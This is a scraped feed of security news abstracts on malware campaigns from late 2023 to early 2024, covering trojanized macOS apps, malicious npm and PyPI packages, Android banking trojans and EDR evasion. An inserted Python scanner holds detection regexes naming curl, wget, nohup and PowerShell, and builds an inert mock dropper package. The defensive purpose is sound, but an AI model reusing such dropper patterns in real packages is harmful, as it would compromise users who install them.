Cracked software has been observed infecting Apple macOS users with a previously undocumented stealer malware capable of harvesting system information and cryptocurrency wallet data. Kaspersky, which identified the artifacts in the wild, said they are designed to target machines running macOS Ventura 13.6 and later, indicating the malware's ability to infect Macs on both Intel and Apple silicon processor architectures. The attack chains leverage booby-trapped disk image (DMG) files that include a program named "Activator" and a pirated version of legitimate software such as xScope. Users who end up opening the DMG files are urged to move both files to the Applications folder and run the Activator component to apply a supposed patch and run the xScope app. Launching Activator, however, displays a prompt asking the victim to enter the system administrator password, thereby allowing it to execute a Mach-O binary with elevated permissions in order to launch the modif (The Hacker News)
January 19, 2024
Experts Warn of macOS Backdoor Hidden in Pirated Versions of Popular Software Full Text
Abstract
Pirated applications targeting Apple macOS users have been observed containing a backdoor capable of granting attackers remote control to infected machines. "These applications are being hosted on Chinese pirating websites in order to gain victims," Jamf Threat Labs researchers Ferdous Saljooki and Jaron Bradley said. "Once detonated, the malware will download and execute multiple payloads in the background in order to secretly compromise the victim's machine." The backdoored disk image (DMG) files, which have been modified to establish communications with actor-controlled infrastructure, include legitimate software like Navicat Premium, UltraEdit, FinalShell, SecureCRT, and Microsoft Remote Desktop. The unsigned applications, besides being hosted on a Chinese website named macyy[.]cn, incorporate a dropper component called "dylib" that's executed every time the application is opened. The dropper then acts as a conduit to fetch a backdoor (The Hacker News)
January 19, 2024
Npm Trojan Bypasses UAC, Installs AnyDesk with “Oscompatible” Package Full Text
Abstract
A malicious package uploaded to the npm registry has been found deploying a sophisticated remote access trojan on compromised Windows machines. The package, named "oscompatible," was published on January 9, 2024, attracting a total of 380 downloads before it was taken down. oscompatible included a "few strange binaries," according to software supply chain security firm Phylum, including a single executable file, a dynamic-link library (DLL) and an encrypted DAT file, alongside a JavaScript file. This JavaScript file ("index.js") executes an "autorun.bat" batch script but only after running a compatibility check to determine if the target machine runs on Microsoft Windows. If the platform is not Windows, it displays an error message to the user, stating the script is running on Linux or an unrecognized operating system, urging them to run it on "Windows Server OS." The batch script, for its part, verifies if it has admin privil (The Hacker News)
January 18, 2024
New Docker Malware Steals CPU for Crypto & Drives Fake Website Traffic Full Text
Abstract
Vulnerable Docker services are being targeted by a novel campaign in which the threat actors are deploying XMRig cryptocurrency miner as well as the 9Hits Viewer software as part of a multi-pronged monetization strategy. "This is the first documented case of malware deploying the 9Hits application as a payload," cloud security firm Cado said, adding the development is a sign that adversaries are always on the lookout for diversifying their strategies to make money off compromised hosts. 9Hits advertises itself as a "unique web traffic solution" and an "automatic traffic exchange" that allows members of the service to drive traffic to their sites in exchange for purchasing credits. This is accomplished by means of a software called 9Hits Viewer, which runs a headless Chrome browser instance to visit websites requested by other members, for which they earn credits to pay for generating traffic to their sites. The exact method used to spread the malwa (The Hacker News)
January 18, 2024
Malware Exploiting 9Hits, Turns Docker Servers into Crypto Miners Full Text
Abstract
Attackers are using off-the-shelf images from Dockerhub to spread malware, with the 9Hits app visiting various websites and the XMRig miner disabled from visiting crypto-related sites to prevent analysis. (Cyware)
January 16, 2024
Remcos RAT Spreading Through Adult Games in New Attack Wave Full Text
Abstract
The remote access trojan (RAT) known as Remcos RAT has been found being propagated via webhards by disguising it as adult-themed games in South Korea. WebHard, short for web hard drive, is a popular online file storage system used to upload, download, and share files in the country. While webhards have been used in the past to deliver njRAT, UDP RAT, and DDoS botnet malware, the AhnLab Security Emergency Response Center's (ASEC) latest analysis shows that the technique has been adopted to distribute Remcos RAT. In these attacks, users are tricked into opening booby-trapped files by passing them off as adult games, which, when launched, execute malicious Visual Basic scripts in order to run an intermediate binary named "ffmpeg.exe." This results in the retrieval of Remcos RAT from an actor-controlled server. A sophisticated RAT, Remcos (aka Remote Control and Surveillance) facilitates unauthorized remote control and surveillance of compromised hosts, enablin (The Hacker News)
January 15, 2024
Azorult Malware Comes to the Fore in New Dark Web Campaign Full Text
Abstract
The Azorult malware, known for stealing sensitive data, has resurfaced with a sophisticated approach. It is distributed through malicious PDF files that contain a shortcut file. (Cyware)
January 15, 2024
Balada Injector Infects Over 7,100 WordPress Sites Using Plugin Vulnerability Full Text
Abstract
Thousands of WordPress sites using a vulnerable version of the Popup Builder plugin have been compromised with a malware called Balada Injector. First documented by Doctor Web in January 2023, the campaign takes place in a series of periodic attack waves, weaponizing security flaws in WordPress plugins to inject a backdoor designed to redirect visitors of infected sites to bogus tech support pages, fraudulent lottery wins, and push notification scams. Subsequent findings unearthed by Sucuri have revealed the massive scale of the operation, which is said to have been active since 2017 and infiltrated no less than 1 million sites since then. The GoDaddy-owned website security company, which detected the latest Balada Injector activity on December 13, 2023, said it identified the injections on over 7,100 sites. These attacks take advantage of a high-severity flaw in Popup Builder (CVE-2023-6000, CVSS score: 8.8) – a plugin with more than 200,000 active installs – that was (The Hacker News)
January 11, 2024
New Python-based FBot Hacking Toolkit Aims at Cloud and SaaS Platforms Full Text
Abstract
A new Python-based hacking tool called FBot has been uncovered targeting web servers, cloud services, content management systems (CMS), and SaaS platforms such as Amazon Web Services (AWS), Microsoft 365, PayPal, Sendgrid, and Twilio. "Key features include credential harvesting for spamming attacks, AWS account hijacking tools, and functions to enable attacks against PayPal and various SaaS accounts," SentinelOne security researcher Alex Delamotte said in a report shared with The Hacker News. FBot is the latest addition to the list of cloud hacking tools like AlienFox, GreenBot (aka Maintance), Legion, and Predator, the latter four of which share code-level overlaps with AndroxGh0st. SentinelOne described FBot as "related but distinct from these families," owing to the fact that it does not reference any source code from AndroxGh0st, although it exhibits similarities with Legion, which first came to light last year. The end goal of the tool is to hijack cloud, SaaS, and (The Hacker News)
January 11, 2024
Atomic Stealer Gets an Upgrade - Targeting Mac Users with Encrypted Payload Full Text
Abstract
Cybersecurity researchers have identified an updated version of a macOS information stealer called Atomic (or AMOS), indicating that the threat actors behind the malware are actively enhancing its capabilities. "It looks like Atomic Stealer was updated around mid to late December 2023, where its developers introduced payload encryption in an effort to bypass detection rules," Malwarebytes' Jérôme Segura said in a Wednesday report. Atomic Stealer first emerged in April 2023 for a monthly subscription of $1,000. It's capable of harvesting sensitive information from a compromised host, including Keychain passwords, session cookies, files, crypto wallets, system metadata, and the machine's password via a fake prompt. Over the past several months, the malware has been observed propagated via malvertising and compromised sites under the guise of legitimate software and web browser updates. Malwarebytes' latest analysis shows that Atomic Stealer is no (The Hacker News)
January 05, 2024
SpectralBlur: New macOS Backdoor Threat from North Korean Hackers Full Text
Abstract
Cybersecurity researchers have discovered a new Apple macOS backdoor called SpectralBlur that overlaps with a known malware family that has been attributed to North Korean threat actors. "SpectralBlur is a moderately capable backdoor that can upload/download files, run a shell, update its configuration, delete files, hibernate, or sleep, based on commands issued from the [command-and-control server]," security researcher Greg Lesnewich said. The malware shares similarities with KANDYKORN (aka SockRacket), an advanced implant that functions as a remote access trojan capable of taking control of a compromised host. It's worth noting that the KANDYKORN activity also intersects with another campaign orchestrated by the Lazarus sub-group known as BlueNoroff (aka TA444) which culminates in the deployment of a backdoor referred to as RustBucket and a late-stage payload dubbed ObjCShellz. In recent months, the threat actor has been observed combining disparate pieces of t... The Hacker News
January 04, 2024
Beware: 3 Malicious PyPI Packages Found Targeting Linux with Crypto Miners Full Text
Abstract
Three new malicious packages have been discovered in the Python Package Index (PyPI) open-source repository with capabilities to deploy a cryptocurrency miner on affected Linux devices. The three harmful packages, named modularseven, driftme, and catme, attracted a total of 431 downloads over the past month before they were taken down. "These packages, upon initial use, deploy a CoinMiner executable on Linux devices," Fortinet FortiGuard Labs researcher Gabby Xiong said, adding the campaign shares overlaps with a prior campaign that involved the use of a package called culturestreak to deploy a crypto miner. The malicious code resides in the __init__.py file, which decodes and retrieves the first stage from a remote server, a shell script ("unmi.sh") that fetches a configuration file for the mining activity as well as the CoinMiner file hosted on GitLab. The ELF binary file is then executed in the background using the nohup command, thus ensuring that the process contin... The Hacker News
January 03, 2024
Malware Using Google MultiLogin Exploit to Maintain Access Despite Password Reset Full Text
Abstract
Information-stealing malware is actively taking advantage of an undocumented Google OAuth endpoint named MultiLogin to hijack user sessions and allow continuous access to Google services even after a password reset. According to CloudSEK, the critical exploit facilitates session persistence and cookie generation, enabling threat actors to maintain access to a valid session in an unauthorized manner. The technique was first revealed by a threat actor named PRISMA on October 20, 2023, on their Telegram channel. It has since been incorporated into various malware-as-a-service (MaaS) stealer families, such as Lumma, Rhadamanthys, Stealc, Meduza, RisePro, and WhiteSnake. The MultiLogin authentication endpoint is primarily designed for synchronizing Google accounts across services when users sign in to their accounts in the Chrome web browser (i.e., profiles). A reverse engineering of the Lumma Stealer code has revealed that the technique targets the "Chrome's token_... The Hacker News
January 01, 2024
New Variant of DLL Search Order Hijacking Bypasses Windows 10 and 11 Protections Full Text
Abstract
Security researchers have detailed a new variant of a dynamic link library (DLL) search order hijacking technique that could be used by threat actors to bypass security mechanisms and achieve execution of malicious code on systems running Microsoft Windows 10 and Windows 11. The approach "leverages executables commonly found in the trusted WinSxS folder and exploits them via the classic DLL search order hijacking technique," cybersecurity firm Security Joes said in a new report exclusively shared with The Hacker News. In doing so, it allows adversaries to eliminate the need for elevated privileges when attempting to run nefarious code on a compromised machine as well as introduce potentially vulnerable binaries into the attack chain, as observed in the past. DLL search order hijacking, as the name implies, involves gaming the search order used to load DLLs in order to execute malicious payloads for purposes of defense evasion, persistence, and privilege escal... The Hacker News
January 01, 2024
New JinxLoader Targeting Users with Formbook and XLoader Malware Full Text
Abstract
A new Go-based malware loader called JinxLoader is being used by threat actors to deliver next-stage payloads such as Formbook and its successor XLoader. The disclosure comes from cybersecurity firms Palo Alto Networks Unit 42 and Symantec, both of which highlighted multi-step attack sequences that led to the deployment of JinxLoader through phishing attacks. "The malware pays homage to League of Legends character Jinx, featuring the character on its ad poster and [command-and-control] login panel," Symantec said. "JinxLoader's primary function is straightforward – loading malware." Unit 42 revealed in late November 2023 that the malware service was first advertised on hackforums[.]net on April 30, 2023, for $60 a month, $120 a year, or for a lifetime fee of $200. The attacks begin with phishing emails impersonating Abu Dhabi National Oil Company (ADNOC), urging recipients to open password-protected RAR archive attachments that, upon opening, ... The Hacker News
December 30, 2023
Info-Stealing Malware Now Includes Google Session Hijacking Full Text
Abstract
Multiple malware-as-a-service info stealers now have the ability to manipulate authentication tokens to gain persistent access to a victim's Google account, even after the user has reset their password. Cyware
December 28, 2023
Four-Year Campaign Backdoored Iphones Using Undocumented Hardware Function Full Text
Abstract
The secret hardware function targeted by the attackers allowed them to bypass advanced memory protections, enabling post-exploitation techniques and compromising system integrity. Cyware
December 28, 2023
New Rugmi Malware Loader Surges with Hundreds of Daily Detections Full Text
Abstract
A new malware loader is being used by threat actors to deliver a wide range of information stealers such as Lumma Stealer (aka LummaC2), Vidar, RecordBreaker (aka Raccoon Stealer V2), and Rescoms. Cybersecurity firm ESET is tracking the trojan under the name Win/TrojanDownloader.Rugmi. "This malware is a loader with three types of components: a downloader that downloads an encrypted payload, a loader that runs the payload from internal resources, and another loader that runs the payload from an external file on the disk," the company said in its Threat Report H2 2023. Telemetry data gathered by the company shows that detections for the Rugmi loader spiked in October and November 2023, surging from single digit daily numbers to hundreds per day. Stealer malware is typically sold under a malware-as-a-service (MaaS) model to other threat actors on a subscription basis. Lumma Stealer, for instance, is advertised in underground forums for $250 a month. The most expen... The Hacker News
December 27, 2023
New Sneaky Xamalicious Android Malware Hits Over 327,000 Devices Full Text
Abstract
A new Android backdoor has been discovered with potent capabilities to carry out a range of malicious actions on infected devices. Dubbed Xamalicious by the McAfee Mobile Research Team, the malware is so named for the fact that it's developed using an open-source mobile app framework called Xamarin and abuses the operating system's accessibility permissions to fulfill its objectives. It's also capable of gathering metadata about the compromised device and contacting a command-and-control (C2) server to fetch a second-stage payload, but only after determining if it fits the bill. The second stage is "dynamically injected as an assembly DLL at runtime level to take full control of the device and potentially perform fraudulent actions such as clicking on ads, installing apps, among other actions financially motivated without user consent," security researcher Fernando Ruiz said. The cybersecurity firm said it identified 25 apps that come with this active thr... The Hacker News
December 26, 2023
Carbanak Banking Malware Resurfaces with New Ransomware Tactics Full Text
Abstract
The banking malware known as Carbanak has been observed being used in ransomware attacks with updated tactics. "The malware has adapted to incorporate attack vendors and techniques to diversify its effectiveness," cybersecurity firm NCC Group said in an analysis of ransomware attacks that took place in November 2023. "Carbanak returned last month through new distribution chains and has been distributed through compromised websites to impersonate various business-related software." Some of the impersonated tools include popular business-related software such as HubSpot, Veeam, and Xero. Carbanak, detected in the wild since at least 2014, is known for its data exfiltration and remote control features. Starting off as a banking malware, it has been put to use by the FIN7 cybercrime syndicate. In the latest attack chain documented by NCC Group, the compromised websites are designed to host malicious installer files masquerading as legitimate utilities to... The Hacker News
December 26, 2023
Stealth Android Backdoor Xamalicious Found Actively Infecting Devices Full Text
Abstract
The Xamalicious backdoor, implemented with Xamarin, targets Android devices by gaining accessibility privileges and communicating with a C2 server to download a second-stage payload, potentially enabling fraudulent actions without user consent. Cyware
December 26, 2023
Nim-based Malware Distributed Using Microsoft Word Docs Impersonating the Nepali Government Full Text
Abstract
The Nim-based backdoor communicates with command and control servers, evades analysis tools, and establishes persistence on the compromised machine through startup folders and scheduled tasks. Cyware
December 23, 2023
Bandook - A Persistent Threat That Keeps Evolving Full Text
Abstract
Bandook malware, a remote access trojan, has evolved with a new variant that uses a PDF file to distribute its payload and injects it into msinfo32.exe, allowing remote attackers to gain control of infected systems. Cyware
December 22, 2023
Rogue WordPress Plugin Exposes E-Commerce Sites to Credit Card Theft Full Text
Abstract
Threat hunters have discovered a rogue WordPress plugin that's capable of creating bogus administrator users and injecting malicious JavaScript code to steal credit card information. The skimming activity is part of a Magecart campaign targeting e-commerce websites, according to Sucuri. "As with many other malicious or fake WordPress plugins it contains some deceptive information at the top of the file to give it a veneer of legitimacy," security researcher Ben Martin said. "In this case, comments claim the code to be 'WordPress Cache Addons.'" Malicious plugins typically find their way to WordPress sites via either a compromised admin user or the exploitation of security flaws in another plugin already installed on the site. Post installation, the plugin replicates itself to the mu-plugins (or must-use plugins) directory so that it's automatically enabled and conceals its presence from the admin panel. "Since the only way to re... The Hacker News
December 22, 2023
Operation RusticWeb: Rust-Based Malware Targets Indian Government Entities Full Text
Abstract
Indian government entities and the defense sector have been targeted by a phishing campaign that's engineered to drop Rust-based malware for intelligence gathering. The activity, first detected in October 2023, has been codenamed Operation RusticWeb by enterprise security firm SEQRITE. "New Rust-based payloads and encrypted PowerShell commands have been utilized to exfiltrate confidential documents to a web-based service engine, instead of a dedicated command-and-control (C2) server," security researcher Sathwik Ram Prakki said. Tactical overlaps have been uncovered between the cluster and those widely tracked under the monikers Transparent Tribe and SideCopy, both of which are assessed to be linked to Pakistan. SideCopy is also a suspected subordinate element within Transparent Tribe. Last month, SEQRITE detailed multiple campaigns undertaken by the threat actor targeting Indian government bodies to deliver numerous trojans such as AllaKore RAT, Ares RAT, an... The Hacker News
December 21, 2023
Chameleon Android Banking Trojan Variant Bypasses Biometric Authentication Full Text
Abstract
Cybersecurity researchers have discovered an updated version of an Android banking malware called Chameleon that has expanded its targeting to include users in the U.K. and Italy. "Representing a restructured and enhanced iteration of its predecessor, this evolved Chameleon variant excels in executing Device Takeover (DTO) using the accessibility service, all while expanding its targeted region," Dutch mobile security firm ThreatFabric said in a report shared with The Hacker News. Chameleon was previously documented by Cyble in April 2023, noting that it had been used to single out users in Australia and Poland since at least January. Like other banking malware, it's known to abuse its permissions to Android's accessibility service to harvest sensitive data and conduct overlay attacks. The rogue apps containing the earlier version were hosted on phishing pages and found to impersonate genuine institutions in the countries, such as the Australian Taxation Offic... The Hacker News
December 21, 2023
New JavaScript Malware Targeted 50,000+ Users at Dozens of Banks Worldwide Full Text
Abstract
A new piece of JavaScript malware has been observed attempting to steal users' online banking account credentials as part of a campaign that has targeted more than 40 financial institutions across the world. The activity cluster, which employs JavaScript web injections, is estimated to have led to at least 50,000 infected user sessions spanning North America, South America, Europe, and Japan. IBM Security Trusteer said it detected the campaign in March 2023. "Threat actors' intention with the web injection module is likely to compromise popular banking applications and, once the malware is installed, intercept the users' credentials in order to then access and likely monetize their banking information," security researcher Tal Langus said. Attack chains are characterized by the use of scripts loaded from the threat actor-controlled server ("jscdnpack[.]com"), specifically targeting a page structure that's common to several banks. It's susp... The Hacker News
December 20, 2023
New Go-Based JaskaGO Malware Targeting Windows and macOS Systems Full Text
Abstract
A new Go-based information stealer malware called JaskaGO has emerged as the latest cross-platform threat to infiltrate both Windows and Apple macOS systems. AT&T Alien Labs, which made the discovery, said the malware is "equipped with an extensive array of commands from its command-and-control (C&C) server." Artifacts designed for macOS were first observed in July 2023, impersonating installers for legitimate software such as CapCut. Other variants of the malware have masqueraded as AnyConnect and security tools. Upon installation, JaskaGO runs checks to determine if it is executing within a virtual machine (VM) environment, and if so, executes a harmless task like pinging Google or printing a random number in a likely effort to fly under the radar. In other scenarios, JaskaGO proceeds to harvest information from the victim system and establishes a connection to its C&C for receiving further instructions, including executing shell commands, enumerating... The Hacker News
December 18, 2023
Rhadamanthys Malware: Swiss Army Knife of Information Stealers Emerges Full Text
Abstract
The developers of the information stealer malware known as Rhadamanthys are actively iterating on its features, broadening its information-gathering capabilities and also incorporating a plugin system to make it more customizable. This approach not only transforms it into a threat capable of delivering "specific distributor needs," but also makes it more potent, Check Point said in a technical deepdive published last week. Rhadamanthys, first documented by ThreatMon in October 2022, has been sold under the malware-as-a-service (MaaS) model as early as September 2022 by an actor under the alias "kingcrete2022." Typically distributed through malicious websites mirroring those of genuine software that are advertised through Google ads, the malware is capable of harvesting a wide range of sensitive information from compromised hosts, including from web browsers, crypto wallets, email clients, VPN, and instant messaging apps. "Rhadamanthys represents a s... The Hacker News
December 18, 2023
QakBot Malware Resurfaces with New Tactics, Targeting the Hospitality Industry Full Text
Abstract
A new wave of phishing messages distributing the QakBot malware has been observed, more than three months after a law enforcement effort saw its infrastructure dismantled by infiltrating its command-and-control (C2) network. Microsoft, which made the discovery, described it as a low-volume campaign that began on December 11, 2023, and targeted the hospitality industry. "Targets received a PDF from a user masquerading as an IRS employee," the tech giant said in a series of posts shared on X (formerly Twitter). "The PDF contained a URL that downloads a digitally signed Windows Installer (.msi). Executing the MSI led to Qakbot being invoked using export 'hvsi' execution of an embedded DLL." Microsoft said that the payload was generated the same day the campaign started and that it's configured with the previously unseen version 0x500. Zscaler ThreatLabz, in a post shared on X, described the resurfaced QakBot as a 64-bit binary that utilizes AES... The Hacker News
December 15, 2023
New NKAbuse Malware Exploits NKN Blockchain Tech for DDoS Attacks Full Text
Abstract
A novel multi-platform threat called NKAbuse has been discovered using a decentralized, peer-to-peer network connectivity protocol known as NKN (short for New Kind of Network) as a communications channel. "The malware utilizes NKN technology for data exchange between peers, functioning as a potent implant, and equipped with both flooder and backdoor capabilities," Russian cybersecurity company Kaspersky said in a Thursday report. NKN, which has over 62,000 nodes, is described as a "software overlay network built on top of today's Internet that enables users to share unused bandwidth and earn token rewards." It incorporates a blockchain layer on top of the existing TCP/IP stack. While threat actors are known to take advantage of emerging communication protocols for command-and-control (C2) purposes and evade detection, NKAbuse leverages blockchain technology to conduct distributed denial-of-service (DDoS) attacks and function as an implant inside com... The Hacker News
December 14, 2023
116 Malware Packages Found on PyPI Repository Infecting Windows and Linux Systems Full Text
Abstract
Cybersecurity researchers have identified a set of 116 malicious packages on the Python Package Index (PyPI) repository that are designed to infect Windows and Linux systems with a custom backdoor. "In some cases, the final payload is a variant of the infamous W4SP Stealer, or a simple clipboard monitor to steal cryptocurrency, or both," ESET researchers Marc-Etienne M.Léveillé and Rene Holt said in a report published earlier this week. The packages are estimated to have been downloaded over 10,000 times since May 2023. The threat actors behind the activity have been observed using three techniques to bundle malicious code into Python packages, namely via a test.py script, embedding PowerShell in setup.py file, and incorporating it in obfuscated form in the __init__.py file. Irrespective of the method used, the end goal of the campaign is to compromise the targeted host with malware, primarily a backdoor capable of remote command execution, data exfiltration, an... The Hacker News
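The two PyPI entries on this page (the modularseven/driftme/catme packages whose __init__.py decodes and fetches a stage that is then run under nohup, and the 116-package set that hides code in a test.py script, embeds PowerShell in setup.py, or obfuscates it in __init__.py) describe package shapes that a static scan can flag before installation. The script below is an added example, not ESET or Fortinet tooling: the indicator regexes, the technique labels, the base64-blob heuristic and the inert sample package it constructs in a temporary directory are all assumptions made for illustration. Nothing in the sample is executed; it is only parsed and scanned.

```python
"""Static indicator scan for the PyPI bundling tricks described above.

Added example, not ESET's or Fortinet's tooling. The indicator regexes,
the technique labels and the sample package are constructed assumptions.
"""
import ast
import base64
import re
import tempfile
from pathlib import Path

# Indicator regexes (assumed heuristics, not vendor signatures).
INDICATORS = {
    "decode": re.compile(r"\b(b64decode|codecs\.decode|zlib\.decompress)\b"),
    "fetch": re.compile(r"\b(urlopen|requests\.get|wget|curl)\b"),
    "exec": re.compile(r"\b(subprocess|os\.system|os\.popen|nohup|exec)\b"),
    "powershell": re.compile(r"powershell", re.IGNORECASE),
    "test_py": re.compile(r"\btest\.py\b"),
}
# A string literal made only of base64 characters, 64+ long, is treated as a blob.
BLOB_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


def encoded_blobs(src: str) -> list[str]:
    """Return string literals in src that look like base64-encoded payloads."""
    try:
        tree = ast.parse(src)
    except SyntaxError:            # unparsable files are scanned by regex only
        return []
    return [n.value for n in ast.walk(tree)
            if isinstance(n, ast.Constant) and isinstance(n.value, str)
            and BLOB_RE.fullmatch(n.value)]


def scan_source(src: str) -> set[str]:
    """Raw indicator hits for one file's source text."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(src)}
    if encoded_blobs(src):
        hits.add("blob")
    return hits


def scan_package(root) -> dict[str, set[str]]:
    """Map each suspicious .py file (path relative to root) to technique labels."""
    root = Path(root)
    report: dict[str, set[str]] = {}
    for py in sorted(root.rglob("*.py")):
        hits = scan_source(py.read_text(errors="replace"))
        techniques = set()
        if py.name == "__init__.py":
            # Decoded blob plus process execution on import: the miner-dropper shape.
            if "exec" in hits and hits & {"decode", "blob"}:
                techniques.add("init_dropper")
            # Download plus execute on import.
            if "fetch" in hits and "exec" in hits:
                techniques.add("init_fetch_exec")
        if py.name == "setup.py":
            if "powershell" in hits:
                techniques.add("setup_powershell")
            if "test_py" in hits and "exec" in hits:
                techniques.add("setup_runs_test_py")
        if techniques:
            report[py.relative_to(root).as_posix()] = techniques
    return report


def build_sample_package(root) -> Path:
    """Write a constructed, inert package that reproduces the three patterns."""
    root = Path(root)
    pkg = root / "sample_pkg"
    pkg.mkdir(parents=True)
    blob = base64.b64encode(b"constructed stage-one placeholder text " * 4).decode()
    (pkg / "__init__.py").write_text(
        "import base64, subprocess\n"
        "from urllib.request import urlopen\n"
        f"_stage = base64.b64decode('{blob}')\n"
        "subprocess.Popen(['sh', '-c', 'nohup true &'])  # constructed, never run\n"
    )
    (root / "setup.py").write_text(
        "import subprocess\n"
        "subprocess.run(['powershell', '-c', 'Write-Host hi'])  # constructed\n"
        "exec(open('test.py').read())  # constructed\n"
        "from setuptools import setup\nsetup(name='sample_pkg')\n"
    )
    (root / "test.py").write_text("print('constructed test.py')\n")
    return root


def demo() -> dict[str, set[str]]:
    """Build the sample package in a temp dir and scan it (nothing is executed)."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_package(tmp)
        return scan_package(tmp)


if __name__ == "__main__":
    for path, techniques in demo().items():
        print(f"{path}: {', '.join(sorted(techniques))}")
```

Run it against an unpacked sdist or wheel directory with `scan_package(path)` before `pip install`; the point of the labels is that install-time behaviour (setup.py spawning PowerShell or sourcing test.py) and import-time behaviour (an __init__.py that decodes a blob and spawns a process) are both visible without executing anything. The heuristics are deliberately loose and will flag some legitimate packages; they are triage, not a verdict.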
December 14, 2023
New Pierogi++ Malware by Gaza Cyber Gang Targeting Palestinian Entities Full Text
Abstract
A pro-Hamas threat actor known as Gaza Cyber Gang is targeting Palestinian entities using an updated version of a backdoor dubbed Pierogi. The findings come from SentinelOne, which has given the malware the name Pierogi++ owing to the fact that it's implemented in the C++ programming language unlike its Delphi- and Pascal-based predecessor. "Recent Gaza Cybergang activities show consistent targeting of Palestinian entities, with no observed significant changes in dynamics since the start of the Israel-Hamas war," security researcher Aleksandar Milenkoski said in a report shared with The Hacker News. Gaza Cyber Gang, believed to be active since at least 2012, has a history of striking targets throughout the Middle East, particularly Israel and Palestine, often leveraging spear-phishing as a method of initial access. Some of the notable malware families in its arsenal include BarbWire, DropBook, LastConn, Molerat Loader, Micropsia, NimbleMamba, SharpSt... The Hacker News
December 13, 2023
Cluster of Malicious Python Packages in PyPI Discovered Distributing Malware Full Text
Abstract
ESET Research has discovered a cluster of malicious Python packages in PyPI, the official Python package repository. These packages target both Windows and Linux systems and deliver a custom backdoor. Cyware
December 11, 2023
GULOADER Adds New Anti-Analysis Tactic to Arsenal Full Text
Abstract
Researchers have identified new techniques employed by the GuLoader malware to enhance its evasion capabilities and make analysis more challenging. The highly evasive shellcode downloader malware was found leveraging Vectored Exception Handler (VEH) capability. Organizations can leverage the late ... Cyware
December 11, 2023
SpyLoan Scandal: 18 Malicious Loan Apps Defraud Millions of Android Users Full Text
Abstract
Cybersecurity researchers have discovered 18 malicious loan apps for Android on the Google Play Store that have been collectively downloaded over 12 million times. "Despite their attractive appearance, these services are in fact designed to defraud users by offering them high-interest-rate loans endorsed with deceitful descriptions, all while collecting their victims' personal and financial information to blackmail them, and in the end gain their funds," ESET said. The Slovak cybersecurity company is tracking these apps under the name SpyLoan, noting they are designed to target potential borrowers located in Southeast Asia, Africa, and Latin America. The list of apps, which have now been taken down by Google, is below - AA Kredit: इंस्टेंट लोन ऐप (com.aa.kredit.android) Amor Cash: Préstamos Sin Buró (com.amorcash.credito.prestamo) Oro Préstamo - Efectivo rápido (com.app.lo.go) Cashwow (com.cashwow.cow.eg) CrediBus Préstamos de crédito (com.dinero.profin.pr... The Hacker News
December 11, 2023
New PoolParty Process Injection Techniques Outsmart Top EDR Solutions Full Text
Abstract
A new collection of eight process injection techniques, collectively dubbed PoolParty, could be exploited to achieve code execution in Windows systems while evading endpoint detection and response (EDR) systems. SafeBreach researcher Alon Leviev said the methods are "capable of working across all processes without any limitations, making them more flexible than existing process injection techniques." The findings were first presented at the Black Hat Europe 2023 conference last week. Process injection refers to an evasion technique used to run arbitrary code in a target process. A wide range of process injection techniques exists, such as dynamic link library (DLL) injection, portable executable injection, thread execution hijacking, process hollowing, and process doppelgänging. PoolParty is so named because it's rooted in a component called Windows user-mode thread pool, leveraging it to insert any type of work item into a target process on the system. I... The Hacker News
December 9, 2023
Bypassing Major EDRs Using Pool Party Process Injection Techniques Full Text
Abstract
The technique utilizes Windows thread pools and includes a chain of three primitives for memory allocation, writing malicious code, and executing it, making it more flexible than existing process injection techniques. Cyware
December 09, 2023
Researchers Unveil GuLoader Malware’s Latest Anti-Analysis Techniques Full Text
Abstract
Threat hunters have unmasked the latest tricks adopted by a malware strain called GuLoader in an effort to make analysis more challenging. "While GuLoader's core functionality hasn't changed drastically over the past few years, these constant updates in their obfuscation techniques make analyzing GuLoader a time-consuming and resource-intensive process," Elastic Security Labs researcher Daniel Stepanic said in a report published this week. First spotted in late 2019, GuLoader (aka CloudEyE) is an advanced shellcode-based malware downloader that's used to distribute a wide range of payloads, such as information stealers, while incorporating a bevy of sophisticated anti-analysis techniques to dodge traditional security solutions. A steady stream of open-source reporting into the malware in recent months has revealed the threat actors behind it have continued to improve its ability to bypass existing or new security features alongside other implemented fe... The Hacker News
December 08, 2023
Mac Users Beware: New Trojan-Proxy Malware Spreading via Pirated Software Full Text
Abstract
Unauthorized websites distributing trojanized versions of cracked software have been found to infect Apple macOS users with a new Trojan-Proxy malware. "Attackers can use this type of malware to gain money by building a proxy server network or to perform criminal acts on behalf of the victim: to launch attacks on websites, companies and individuals, buy guns, drugs, and other illicit goods," Kaspersky security researcher Sergey Puzan said. The Russian cybersecurity firm said it found evidence indicating that the malware is a cross-platform threat, owing to artifacts unearthed for Windows and Android that piggybacked on pirated tools. The macOS variants propagate under the guise of legitimate multimedia, image editing, data recovery, and productivity tools. This suggests that users searching for pirated software are the targets of the campaign. Unlike their genuine, unaltered counterparts, which are offered as disk image (.DMG) files, the rogue versions are delivered... The Hacker News
December 8, 2023
New Variants of HeadCrab Malware Commandeer Thousands of Servers Full Text
Abstract
The HeadCrab malware has resurfaced with a new variant that allows root access to Redis servers, infecting over 1,100 servers and enabling the attacker to control and modify responses. Cyware
December 07, 2023
New Stealthy ‘Krasue’ Linux Trojan Targeting Telecom Firms in Thailand Full Text
Abstract
A previously unknown Linux remote access trojan called Krasue has been observed targeting telecom companies in Thailand by threat actors to maintain covert access to victim networks since at least 2021. Named after a nocturnal female spirit of Southeast Asian folklore, the malware is "able to conceal its own presence during the initialization phase," Group-IB said in a report shared with The Hacker News. The exact initial access vector used to deploy Krasue is currently not known, although it's suspected that it could be via vulnerability exploitation, credential brute-force attacks, or downloaded as part of a bogus software package or binary. The scale of the campaign is ... The malware's core functionalities are realized through a rootkit that allows it to maintain persistence on the host without attracting any attention. The rootkit is derived from open-source projects such as Diamorphine, Suterusu, and Rooty. This has raised the possibility that Krasue is eithe... The Hacker News
December 6, 2023
SpyLoan Android Malware Targets Users in Southeast Asia, Africa, and Latin America Full Text
Abstract
These apps trick users into providing sensitive personal and financial information, which is then used to blackmail them. The apps focus on users in Southeast Asia, Africa, and Latin America. Cyware
December 4, 2023
New Variant of P2Pinfect Targets MIPS Devices Including Routers and IoT Devices Full Text
Abstract
The new variant includes updated evasion techniques, such as Virtual Machine detection, debugger detection, and anti-forensics measures on Linux hosts, making it more difficult for researchers to analyze. Cyware
December 01, 2023
New FjordPhantom Android Malware Targets Banking Apps in Southeast Asia Full Text
Abstract
